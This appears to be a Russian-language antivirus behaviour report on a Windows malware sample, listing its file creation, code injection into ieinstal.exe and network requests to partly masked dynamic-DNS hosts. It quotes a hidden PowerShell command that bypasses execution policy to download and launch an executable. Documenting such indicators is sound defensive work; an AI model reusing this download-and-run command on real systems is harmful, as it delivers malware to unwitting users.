Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ma######hilala.ddnsgeek.com/dlmwptb_signed_tw.exe как %appdata%\dlmwptb_signed_tw.exe
Внедряет код в
следующие пользовательские процессы:
- ieinstal.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\dlmwptb_signed_tw.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ma######hilala.ddnsgeek.com/dlmwptb_Signed_tw.exe
- http://sp#######nce-cloud.gleeze.com/buts/71qWCcTcD1gIFZIEsa2yFFvgXpYFs50JT6ukG/dlmw
UDP
- DNS ASK ma######hilala.ddnsgeek.com
- DNS ASK sp#######nce-cloud.gleeze.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\dlmwptb_signed_tw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma######hilala.ddnsgeek.com/dlmwptb_Signed_tw.exe','%APPDATA%\dlmwptb_...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'
